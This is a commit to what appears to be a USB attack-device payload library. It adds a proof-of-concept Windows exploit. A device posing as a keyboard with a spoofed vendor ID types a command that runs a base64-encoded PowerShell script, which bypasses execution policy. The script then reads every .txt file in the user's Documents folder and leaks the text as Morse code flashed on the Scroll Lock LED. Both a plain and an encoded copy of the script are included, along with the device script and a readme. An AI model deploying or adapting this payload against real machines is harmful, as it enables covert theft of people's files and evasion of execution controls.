Morse Code File Exfiltration (#429)

* Add files via upload * Update readme.md * Update payload.txt * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Update readme.md * Add files via upload * Update readme.md * Update readme.md * Add Payload WIN_PoSH_HKU_RegBackUp * Update readme.md * Update payload.txt * Change for admin shell * Update readme.md * Update payload.txt * Update payload.txt * Update readme.md * Added payload WIN_PoSH_SaveSecurityHive Added new payload to exfiltration that saves the HKLM security hive to the bunny * Morse Code File Exfiltration A bit pointless with limitation of morse code but I thought it was fun to create. * Update readme.md * Update for non-alphanumeric * Update for timing * Update readme.md
2025-10-29 16:58:25 +00:00 · 2021-04-04 17:33:48 +01:00 · 2021-04-04 17:33:48 +01:00 · 27d63ad5a5
commit 27d63ad5a5
parent e9916c88aa
4 changed files with 89 additions and 0 deletions
--- a/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/MorseCodeFileExfiltration.ps1
@ -0,0 +1,33 @@
+$o = New-Object -com wscript.shell;
+$h = @{ "1"="39999"; "2"="33999"; "3"="33399"; "4"="33339"; "5"="33333"; "6"="93333"; "7"="99333"; "8"="99933"; "9"="99993"; "0"="99999"; "A"="39"; "B"="9333"; "C"="9393"; "D"="933"; "E"="3"; "F"="3393"; "G"="993"; "H"="3333"; "I"="33"; "J"="3999"; "K"="939"; "L"="3933"; "M"="99"; "N"="93"; "O"="999"; "P"="3993"; "Q"="9939"; "R"="393"; "S"="333"; "T"="9"; "U"="339"; "V"="3339"; "W"="399"; "X"="9339"; "Y"="9399"; "Z"="9933" };
+$l = '{SCROLLLOCK}';
+function flashy($t){    
+    $o.SendKeys($l);
+    sleep -m ([int]$t);
+    $o.SendKeys($l);	
+	#[console]::beep(600,([int]$t));
+    sleep -m 300;
+}
+gci ([Environment]::GetFolderPath('MyDocuments')) -file -r *.txt | % { gc($_.FullName).ToUpper()} | % {$_[0..($_.length)]} | % {
+    $v = $h[[string]$_];
+    if ($v)
+    {
+        $v| % {$_[0..($_.length)]} | % {
+            flashy((([int]([string]$_))*100));
+        }
+    }
+    elseif ((!$v) -and !(([int]$_) -eq 32))
+    {
+        flashy(2700);
+        $v = ([string]([int]$_));
+        $v| % {$_[0..($_.length)]} | % {
+            $h[[string]$_] | % {$_[0..($_.length)]} | % {
+                flashy((([int]([string]$_))*100));
+            }
+        }
+    }else{ 
+        sleep -m 1200;
+    }
+    sleep -m 600;
+ }
+ 
--- a/payloads/library/poc/WIN_PoSH_MorseCode/b.txt
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/b.txt
@ -0,0 +1 @@
+JABvACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAdwBzAGMAcgBpAHAAdAAuAHMAaABlAGwAbAA7ACAAJABoACAAPQAgAEAAewAgACIAMQAiAD0AIgAzADkAOQA5ADkAIgA7ACAAIgAyACIAPQAiADMAMwA5ADkAOQAiADsAIAAiADMAIgA9ACIAMwAzADMAOQA5ACIAOwAgACIANAAiAD0AIgAzADMAMwAzADkAIgA7ACAAIgA1ACIAPQAiADMAMwAzADMAMwAiADsAIAAiADYAIgA9ACIAOQAzADMAMwAzACIAOwAgACIANwAiAD0AIgA5ADkAMwAzADMAIgA7ACAAIgA4ACIAPQAiADkAOQA5ADMAMwAiADsAIAAiADkAIgA9ACIAOQA5ADkAOQAzACIAOwAgACIAMAAiAD0AIgA5ADkAOQA5ADkAIgA7ACAAIgBBACIAPQAiADMAOQAiADsAIAAiAEIAIgA9ACIAOQAzADMAMwAiADsAIAAiAEMAIgA9ACIAOQAzADkAMwAiADsAIAAiAEQAIgA9ACIAOQAzADMAIgA7ACAAIgBFACIAPQAiADMAIgA7ACAAIgBGACIAPQAiADMAMwA5ADMAIgA7ACAAIgBHACIAPQAiADkAOQAzACIAOwAgACIASAAiAD0AIgAzADMAMwAzACIAOwAgACIASQAiAD0AIgAzADMAIgA7ACAAIgBKACIAPQAiADMAOQA5ADkAIgA7ACAAIgBLACIAPQAiADkAMwA5ACIAOwAgACIATAAiAD0AIgAzADkAMwAzACIAOwAgACIATQAiAD0AIgA5ADkAIgA7ACAAIgBOACIAPQAiADkAMwAiADsAIAAiAE8AIgA9ACIAOQA5ADkAIgA7ACAAIgBQACIAPQAiADMAOQA5ADMAIgA7ACAAIgBRACIAPQAiADkAOQAzADkAIgA7ACAAIgBSACIAPQAiADMAOQAzACIAOwAgACIAUwAiAD0AIgAzADMAMwAiADsAIAAiAFQAIgA9ACIAOQAiADsAIAAiAFUAIgA9ACIAMwAzADkAIgA7ACAAIgBWACIAPQAiADMAMwAzADkAIgA7ACAAIgBXACIAPQAiADMAOQA5ACIAOwAgACIAWAAiAD0AIgA5ADMAMwA5ACIAOwAgACIAWQAiAD0AIgA5ADMAOQA5ACIAOwAgACIAWgAiAD0AIgA5ADkAMwAzACIAIAB9ADsAIAAkAGwAIAA9ACAAJwB7AFMAQwBSAE8ATABMAEwATwBDAEsAfQAnADsAIABmAHUAbgBjAHQAaQBvAG4AIABmAGwAYQBzAGgAeQAoACQAdAApAHsAIAAgACAAIAAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAKABbAGkAbgB0AF0AJAB0ACkAOwAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAMwAwADAAOwAgAH0AIABnAGMAaQAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACcATQB5AEQAbwBjAHUAbQBlAG4AdABzACcAKQApACAALQBmAGkAbABlACAALQByACAAKgAuAHQAeAB0ACAAfAAgACUAIAB7ACAAZwBjACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkALgBUAG8AVQBwAHAAZQByACgAKQB9ACAAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACQAdgAgAD0AIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AOwAgACAAIAAgACAAaQBmACAAKAAkAHYAKQAgACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABmAGwAYQBzAGgAeQAoACgAKABbAGkAbgB0AF0AKABbAHMAdAByAGkAbgBnAF0AJABfACkAKQAqADEAMAAwACkAKQA7ACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgAH0AIAAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAoACEAJAB2ACkAIAAtAGEAbgBkACAAIQAoACgAWwBpAG4AdABdACQAXwApACAALQBlAHEAIAAzADIAKQApACAAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgAGYAbABhAHMAaAB5ACgAMgA3ADAAMAApADsAIAAgACAAIAAgACAAIAAgACAAJAB2ACAAPQAgACgAWwBzAHQAcgBpAG4AZwBdACgAWwBpAG4AdABdACQAXwApACkAOwAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AIAB8ACAAJQAgAHsAJABfAFsAMAAuAC4AKAAkAF8ALgBsAGUAbgBnAHQAaAApAF0AfQAgAHwAIAAlACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZgBsAGEAcwBoAHkAKAAoACgAWwBpAG4AdABdACgAWwBzAHQAcgBpAG4AZwBdACQAXwApACkAKgAxADAAMAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgACAAIAAgACAAfQAgACAAIAAgACAAfQBlAGwAcwBlAHsAIAAgACAAIAAgACAAIAAgACAAIABzAGwAZQBlAHAAIAAtAG0AIAAxADIAMAAwADsAIAAgACAAIAAgAH0AIAAgACAAIAAgAHMAbABlAGUAcAAgAC0AbQAgADYAMAAwADsAIAAgAH0A
--- a/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/payload.txt
@ -0,0 +1,22 @@
+# Title:        Morse Code File Exfiltration
+# Description:  Reads all txt file and Flashes the Scrolllock on and off to represent morse code  
+# Author:       Cribbit
+# Version:      1.0
+# Category:     PoC
+# Target:       Windows (Powershell 5.1+)
+# Attackmodes:	HID & STORAGE
+# Extensions:   Run
+# Notes:	Morse code only surports [0..9A..Z] so other char will be show as blanks	
+
+LED SETUP
+
+GET SWITCH_POSITION
+
+ATTACKMODE HID STORAGE VID_0X05AC PID_0X021E
+
+LED ATTACK
+
+QUACK DELAY 200
+RUN WIN "powershell .(powershell.exe -encodedCommand (gc((gwmi win32_volume -f 'label=''BashBunny''').Name+'payloads\\$SWITCH_POSITION\b.txt')))"
+
+LED FINISH
--- a/payloads/library/poc/WIN_PoSH_MorseCode/readme.md
+++ b/payloads/library/poc/WIN_PoSH_MorseCode/readme.md
@ -0,0 +1,33 @@
+# Morse Code File Exfiltration
+* Author: Cribbit 
+* Version: 1.0
+* Target: Windows (Powershell 5.1+)
+* Category: PoC
+* Attackmode: HID & Storage
+
+## Change Log
+| Version | Changes                       |
+| ------- | ------------------------------|
+| 1.0     | Initial release               |
+| 1.1     | Update for non-alphanumeric   |
+| 1.2     | Update for space timing       |
+
+## Description
+Reads all txt file in my documents and Flashes the Scrolllock on and off to represent Morse code of the engish alphanumeric characters (0..9 A..Z)
+
+## Update
+For characters out side the Morse code 0..9 A..Z it now flash one long pulse then the chars ordinal value ie (@ = 64 = -.... ....-)  
+
+## Note
+This is not a very useful payload with limitation of morse code but I thought it was fun to create.
+
+The payload uses a base64 encode version of the payload (b.txt) to get round the Script Execution Policy. There is a non-base64 version in the file (MorseCodeFileExfiltration.ps1) so you can see what it is doing. 
+
+Please check the encoded payload before execution, to make sure it has not been replaced with something more malicious. 
+
+## Colors
+| Status    | Color                         | Description                                      |
+| --------- | ------------------------------| ------------------------------------------------ |
+| SETUP     | Magenta solid                 | Setting attack mode                              | 
+| ATTACK    | Yellow single blink           | Injecting Powershell script                      | 
+| FINISH    | Green blink followed by SOLID | Script is finished                               |
				`@ -0,0 +1 @@`
				JABvACAAPQAgAE4AZQB3AC0ATwBiAGoAZQBjAHQAIAAtAGMAbwBtACAAdwBzAGMAcgBpAHAAdAAuAHMAaABlAGwAbAA7ACAAJABoACAAPQAgAEAAewAgACIAMQAiAD0AIgAzADkAOQA5ADkAIgA7ACAAIgAyACIAPQAiADMAMwA5ADkAOQAiADsAIAAiADMAIgA9ACIAMwAzADMAOQA5ACIAOwAgACIANAAiAD0AIgAzADMAMwAzADkAIgA7ACAAIgA1ACIAPQAiADMAMwAzADMAMwAiADsAIAAiADYAIgA9ACIAOQAzADMAMwAzACIAOwAgACIANwAiAD0AIgA5ADkAMwAzADMAIgA7ACAAIgA4ACIAPQAiADkAOQA5ADMAMwAiADsAIAAiADkAIgA9ACIAOQA5ADkAOQAzACIAOwAgACIAMAAiAD0AIgA5ADkAOQA5ADkAIgA7ACAAIgBBACIAPQAiADMAOQAiADsAIAAiAEIAIgA9ACIAOQAzADMAMwAiADsAIAAiAEMAIgA9ACIAOQAzADkAMwAiADsAIAAiAEQAIgA9ACIAOQAzADMAIgA7ACAAIgBFACIAPQAiADMAIgA7ACAAIgBGACIAPQAiADMAMwA5ADMAIgA7ACAAIgBHACIAPQAiADkAOQAzACIAOwAgACIASAAiAD0AIgAzADMAMwAzACIAOwAgACIASQAiAD0AIgAzADMAIgA7ACAAIgBKACIAPQAiADMAOQA5ADkAIgA7ACAAIgBLACIAPQAiADkAMwA5ACIAOwAgACIATAAiAD0AIgAzADkAMwAzACIAOwAgACIATQAiAD0AIgA5ADkAIgA7ACAAIgBOACIAPQAiADkAMwAiADsAIAAiAE8AIgA9ACIAOQA5ADkAIgA7ACAAIgBQACIAPQAiADMAOQA5ADMAIgA7ACAAIgBRACIAPQAiADkAOQAzADkAIgA7ACAAIgBSACIAPQAiADMAOQAzACIAOwAgACIAUwAiAD0AIgAzADMAMwAiADsAIAAiAFQAIgA9ACIAOQAiADsAIAAiAFUAIgA9ACIAMwAzADkAIgA7ACAAIgBWACIAPQAiADMAMwAzADkAIgA7ACAAIgBXACIAPQAiADMAOQA5ACIAOwAgACIAWAAiAD0AIgA5ADMAMwA5ACIAOwAgACIAWQAiAD0AIgA5ADMAOQA5ACIAOwAgACIAWgAiAD0AIgA5ADkAMwAzACIAIAB9ADsAIAAkAGwAIAA9ACAAJwB7AFMAQwBSAE8ATABMAEwATwBDAEsAfQAnADsAIABmAHUAbgBjAHQAaQBvAG4AIABmAGwAYQBzAGgAeQAoACQAdAApAHsAIAAgACAAIAAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAKABbAGkAbgB0AF0AJAB0ACkAOwAgACAAIAAgACAAJABvAC4AUwBlAG4AZABLAGUAeQBzACgAJABsACkAOwAgACAAIAAgACAAcwBsAGUAZQBwACAALQBtACAAMwAwADAAOwAgAH0AIABnAGMAaQAgACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoARwBlAHQARgBvAGwAZABlAHIAUABhAHQAaAAoACcATQB5AEQAbwBjAHUAbQBlAG4AdABzACcAKQApACAALQBmAGkAbABlACAALQByACAAKgAuAHQAeAB0ACAAfAAgACUAIAB7ACAAZwBjACgAJABfAC4ARgB1AGwAbABOAGEAbQBlACkALgBUAG8AVQBwAHAAZQByACgAKQB9ACAAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACQAdgAgAD0AIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AOwAgACAAIAAgACAAaQBmACAAKAAkAHYAKQAgACAAIAAgACAAewAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIABmAGwAYQBzAGgAeQAoACgAKABbAGkAbgB0AF0AKABbAHMAdAByAGkAbgBnAF0AJABfACkAKQAqADEAMAAwACkAKQA7ACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgAH0AIAAgACAAIAAgAGUAbABzAGUAaQBmACAAKAAoACEAJAB2ACkAIAAtAGEAbgBkACAAIQAoACgAWwBpAG4AdABdACQAXwApACAALQBlAHEAIAAzADIAKQApACAAIAAgACAAIAB7ACAAIAAgACAAIAAgACAAIAAgAGYAbABhAHMAaAB5ACgAMgA3ADAAMAApADsAIAAgACAAIAAgACAAIAAgACAAJAB2ACAAPQAgACgAWwBzAHQAcgBpAG4AZwBdACgAWwBpAG4AdABdACQAXwApACkAOwAgACAAIAAgACAAIAAgACAAIAAkAHYAfAAgACUAIAB7ACQAXwBbADAALgAuACgAJABfAC4AbABlAG4AZwB0AGgAKQBdAH0AIAB8ACAAJQAgAHsAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGgAWwBbAHMAdAByAGkAbgBnAF0AJABfAF0AIAB8ACAAJQAgAHsAJABfAFsAMAAuAC4AKAAkAF8ALgBsAGUAbgBnAHQAaAApAF0AfQAgAHwAIAAlACAAewAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAZgBsAGEAcwBoAHkAKAAoACgAWwBpAG4AdABdACgAWwBzAHQAcgBpAG4AZwBdACQAXwApACkAKgAxADAAMAApACkAOwAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0AIAAgACAAIAAgACAAIAAgACAAfQAgACAAIAAgACAAfQBlAGwAcwBlAHsAIAAgACAAIAAgACAAIAAgACAAIABzAGwAZQBlAHAAIAAtAG0AIAAxADIAMAAwADsAIAAgACAAIAAgAH0AIAAgACAAIAAgAHMAbABlAGUAcAAgAC0AbQAgADYAMAAwADsAIAAgAH0A